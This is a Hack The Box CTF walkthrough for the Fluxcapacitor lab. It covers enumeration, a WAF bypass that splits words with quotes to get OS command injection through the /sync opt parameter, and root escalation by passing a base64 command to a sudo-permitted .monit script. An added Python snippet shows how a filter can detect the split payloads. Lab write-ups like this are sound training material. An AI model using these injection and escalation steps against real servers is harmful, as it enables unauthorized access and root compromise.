Hack the Box Challenge: Fluxcapacitor Walkthrough


Hello friends!! Today we are sharing our experience, which can be helpful in solving the new CTF challenge Fluxcapacitor from Hack The Box. Solving this lab is not very easy; all you need is your web penetration testing skill to solve this challenge. This lab is designed around bypassing a Web Application Firewall (WAF) to exploit an OS command injection vulnerability in the machine.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online; therefore they have a static IP. Fluxcapacitor has the IP 10.10.10.69.
As we know, the initial stage is enumeration; therefore we use an nmap version scan to gather information about the target machine and its running services.
nmap -sV 10.10.10.69




So from the scanning result we learned that port 80 is open for web services and is protected by a web application firewall, “superWAF”. We therefore explored the target IP in the web browser but found nothing interesting.

Then we looked into its source code and saw an interesting comment pointing towards the URL /sync, so without wasting time we opened /sync in the browser.

LOL!!! It gave a 403 Forbidden error message and mentioned openresty/1.13.6.1. We then searched Google for any exploit related to this version but failed to find any working exploit against it.

At this point, we decided to use Burp Suite to intercept our browser request. After intercepting the HTTP request, the raw request is sent to the Repeater.

Huhhhh!! It was responding with the same output as in the web browser. There might be a WAF filter restricting the User-Agent, such as Mozilla Firefox/5.0.

So we started scrutinizing the User-Agent field by replacing the original user-agent content with a random value, “raj”. Finally!!! It returned the current timestamp, as disclosed in the comment found in the source code of the home page.

Now it was confirmed that SuperWAF filters the User-Agent field. We tried to search for an exploit on Google but did not find any particular one. Nevertheless, Google gave a little hint about OS command injection, and on that basis we tried a few parameters in the URL, such as /sync?test=ls, which responded with the same timestamp every time. Hence we need to fuzz for the right parameter name, and for that we use wfuzz in the next step.

So we use the common.txt wordlist to brute-force the parameter name with the command below.
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19
It gave a 403 response for the payload “opt”; let’s try opt after /sync and examine the response.

Now use the ‘opt’ parameter to bypass the WAF and execute the ls command through it. HOWEVER, there is again a trick to executing ls, because the WAF will not allow you to perform OS command injection directly, so it is a little tougher to exploit. But THANKS to medium.com, from which I got the idea for bypassing the WAF to exploit OS command injection, known as string literal concatenation: adjacent string literals are concatenated without any operator, so the shell joins the quoted fragments back into one command before it runs them.

We took help from the website I mentioned above and executed three commands, whoami, id and uname, through curl as shown in the image. The whole URL is double-quoted so that the single quotes inside the opt value reach the server instead of being consumed by the local shell.
curl "http://10.10.10.69/sync?opt=' whoami'"
curl "http://10.10.10.69/sync?opt=' id'"
curl "http://10.10.10.69/sync?opt=' u'n'ame -a'"
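The quote splitting above works because the shell joins adjacent quoted and unquoted fragments before it looks up the command name, so a filter that matches on the raw parameter value never sees ls, cat or uname. The following Python is added here as an example (it is not code from the original post or from the box): it resolves that concatenation the way the shell would and shows what a rule sees before and after normalization. The sample values are constructed and the watched-command list is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values, shaped like the opt= payloads in this walkthrough.
SAMPLE_OPT_VALUES = [
    "' u'n'ame -a'",
    "' l's' /home'",
    "' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''",
    "%27%20l%27s%27%20/home%27",  # the ls payload as it arrives URL-encoded
]
# Command names a rule on this parameter might watch for (assumed list).
WATCHED_COMMANDS = {"whoami", "id", "uname", "ls", "cat", "sudo"}
WORD = re.compile(r"[A-Za-z0-9_./-]+")

def shell_concat(value: str) -> str:
    """Resolve quote concatenation the way a POSIX shell does: adjacent quoted
    and unquoted fragments join into one string and the quote characters vanish.
    Backslash escapes the next char outside single quotes (simplified model)."""
    out, in_single, in_double, i = [], False, False, 0
    while i < len(value):
        ch = value[i]
        if in_single:
            if ch == "'":
                in_single = False
            else:
                out.append(ch)
        elif ch == "'" and not in_double:
            in_single = True
        elif ch == '"':
            in_double = not in_double
        elif ch == "\\" and i + 1 < len(value):
            i += 1
            out.append(value[i])
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def naive_commands(raw_value: str) -> set:
    """Whole-word match on the decoded value without resolving quotes."""
    return set(WORD.findall(unquote_plus(raw_value))) & WATCHED_COMMANDS

def flagged_commands(raw_value: str) -> set:
    """The same match after decoding and resolving quote concatenation."""
    return set(WORD.findall(shell_concat(unquote_plus(raw_value)))) & WATCHED_COMMANDS

if __name__ == "__main__":
    for raw in SAMPLE_OPT_VALUES:
        print(repr(raw), "naive:", sorted(naive_commands(raw)), "resolved:", sorted(flagged_commands(raw)))
```

The naive match finds nothing in any of the split payloads, while the normalized match reports ls, cat and uname; a filter should therefore decode and normalize the value before matching.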

Superb!! It was great to know that we had bypassed the WAF successfully, but the task is not completed yet.

Let’s seize the user.txt and root.txt files and finish this task. Hhhhhh!!!! Believe me, it is still not easy to bypass the WAF even when your goal is near. We seriously put in great effort and at last found user.txt when we executed the commands below.

curl "http://10.10.10.69/sync?opt=' l's' /home'"
curl "http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'"
curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"




Now the goal was the root.txt file. Taking a lesson from the previous experience, I chose to run the sudo -l command to check the sudo privileges of the current user.
curl "http://10.10.10.69/sync?opt=' sudo -l'"

Awesome!! It told us that we can run a script, “.monit” inside the /home/themiddle/ directory, with root privileges without a password. Let’s open it with the help of the cat command.
curl "http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''"
After reading the .monit file, we concluded that the script takes two parameters, i.e. the string cmd and a base64-encoded value; when the conditions match, it decodes the value and passes the result to bash -c as a parameter.

Hence it was clear that the 1st parameter must match the string “cmd” and the 2nd is base64-decoded. For that reason we first generated the base64 value for the command cat /root/root.txt, because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now, with the help of the sudo privilege, execute the command to gain root access and complete the task by grabbing root.txt.

curl "http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='"

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

